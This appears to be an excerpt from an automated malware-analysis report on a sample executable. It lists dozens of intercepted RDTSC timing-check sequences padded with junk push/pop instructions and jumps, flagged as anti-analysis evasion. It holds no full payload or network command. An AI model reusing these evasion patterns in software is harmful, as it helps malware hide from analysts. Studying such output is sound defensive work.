Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3C7D0 second address: B3C7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CAB0 second address: B3CAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CAB6 second address: B3CACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FDFF8F7915Fh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CC61 second address: B3CC7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FDFF9160A30h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CDD5 second address: B3CDDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2B6 second address: AEA2BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2BA second address: AEA2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2C0 second address: AEA2C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AEA2C5 second address: AEA369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jnp 00007FDFF8F7915Ch 0x00000010 mov dword ptr [ebp+12469D8Dh], esi 0x00000016 mov ebx, dword ptr [ebp+1247D250h] 0x0000001c mov dword ptr [ebp+122D1997h], esi 0x00000022 add eax, ebx 0x00000024 sbb cx, E4C1h 0x00000029 nop 0x0000002a jmp 00007FDFF8F79161h 0x0000002f push eax 0x00000030 pushad 0x00000031 jl 00007FDFF8F7916Bh 0x00000037 jmp 00007FDFF8F79165h 0x0000003c pushad 0x0000003d jmp 00007FDFF8F79166h 0x00000042 jl 00007FDFF8F79156h 0x00000048 popad 0x00000049 popad 0x0000004a nop 0x0000004b or dword ptr [ebp+12471D0Eh], edi 0x00000051 push 00000004h 0x00000053 mov dword ptr [ebp+122D2129h], ebx 0x00000059 nop 0x0000005a jmp 00007FDFF8F79166h 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push esi 0x00000063 pushad 0x00000064 popad 0x00000065 pop esi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3CF01 second address: B3CF0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3D092 second address: B3D0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007FDFF8F7915Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3DA7F second address: B3DA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B3DA89 second address: B3DAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDFF8F7915Bh 0x0000000e jmp 00007FDFF8F7915Bh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4292D second address: B42941 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007FDFF9160A26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FDFF9160A42h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B42941 second address: B4295B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F79166h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41CF4 second address: B41CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F48 second address: B41F6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDFF8F79156h 0x0000000a jmp 00007FDFF8F7915Bh 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FDFF8F7915Ah 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F6F second address: B41F74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F74 second address: B41F8F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jl 00007FDFF8F79156h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDFF8F7915Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B41F8F second address: B41F9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FDFF9160A26h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B420D6 second address: B420DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B420DC second address: B420E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B420E2 second address: B420E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B45448 second address: B4544E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4D038 second address: B4D03C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4D03C second address: B4D065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FDFF9160A39h 0x0000000c pushad 0x0000000d jbe 00007FDFF9160A26h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF5D second address: B4AF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDFF8F7915Fh 0x0000000b popad 0x0000000c ja 00007FDFF8F79169h 0x00000012 jmp 00007FDFF8F7915Dh 0x00000017 jnl 00007FDFF8F79156h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF8C second address: B4AF93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF93 second address: B4AF99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AF99 second address: B4AFA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDFF9160A26h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AFA8 second address: B4AFAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4AFAC second address: B4AFB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B4FB second address: B4B507 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FDFF8F79156h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B804 second address: B4B808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B808 second address: B4B81A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FDFF8F79156h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B81A second address: B4B81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4B81E second address: B4B838 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79160h 0x00000007 je 00007FDFF8F79156h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BB4C second address: B4BB52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BB52 second address: B4BB56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE75 second address: B4BE8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A34h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE8D second address: B4BE99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE99 second address: B4BE9F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BE9F second address: B4BEA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4BEA7 second address: B4BEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4C13F second address: B4C143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4C143 second address: B4C149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B4CD4F second address: B4CD63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B52F9E second address: B52FA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FDFF9160A26h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B52FA9 second address: B52FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FDFF8F7915Eh 0x0000000f jmp 00007FDFF8F79161h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDFF8F7915Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5249F second address: B524BB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A32h 0x00000007 ja 00007FDFF9160A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F5E1 second address: B5F615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF8F7915Eh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FDFF8F79156h 0x00000012 jmp 00007FDFF8F79169h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F615 second address: B5F619 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F619 second address: B5F621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F621 second address: B5F62C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F873 second address: B5F88F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79165h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F88F second address: B5F89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jl 00007FDFF9160A2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5F9FE second address: B5FA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FDFF8F79156h 0x0000000a jmp 00007FDFF8F79160h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FA18 second address: B5FA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FA1C second address: B5FA22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FB82 second address: B5FB88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B5FE7F second address: B5FE83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B6077A second address: B607A7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDFF9160A26h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDFF9160A2Eh 0x00000015 jmp 00007FDFF9160A2Fh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B607A7 second address: B607D6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jo 00007FDFF8F79156h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDFF8F79164h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDFF8F7915Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F0F second address: B60F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F13 second address: B60F21 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDFF8F79156h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F21 second address: B60F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FDFF9160A26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B60F2B second address: B60F46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79167h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B68034 second address: B68042 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FDFF9160A26h 0x0000000a pop edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67BFE second address: B67C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDFF8F79156h 0x0000000a jng 00007FDFF8F79156h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67C13 second address: B67C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67C19 second address: B67C31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79164h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B67D6C second address: B67D86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF9160A36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B74197 second address: B741A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FDFF8F79156h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741A4 second address: B741C2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDFF9160A26h 0x00000008 jnc 00007FDFF9160A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push esi 0x00000012 pop esi 0x00000013 push edi 0x00000014 pop edi 0x00000015 popad 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741C2 second address: B741C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741C6 second address: B741E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDFF9160A36h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B741E6 second address: B741EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B73D3E second address: B73D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDFF9160A26h 0x0000000a jng 00007FDFF9160A26h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B73D50 second address: B73D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDFF8F79160h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B33 second address: B78B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B3E second address: B78B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B42 second address: B78B4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B4F second address: B78B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B78B55 second address: B78B60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AA1E57 second address: AA1E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: AA1E5D second address: AA1E7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007FDFF9160A2Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jnc 00007FDFF9160A26h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B87344 second address: B8736D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FDFF8F79156h 0x00000009 jmp 00007FDFF8F79161h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jp 00007FDFF8F7915Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B8736D second address: B87371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B8E6B9 second address: B8E6DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F79163h 0x00000007 jmp 00007FDFF8F7915Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B8E3C7 second address: B8E3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92A9F second address: B92ADD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDFF8F7915Fh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FDFF8F7915Dh 0x00000011 jmp 00007FDFF8F79167h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92ADD second address: B92B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jl 00007FDFF9160A4Eh 0x0000000c push esi 0x0000000d jmp 00007FDFF9160A36h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h4ZgewNxoj.exe RDTSC instruction interceptor: First address: B92C78 second address: B92C86 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FDFF8F79156h 0x0000000e rdtsc
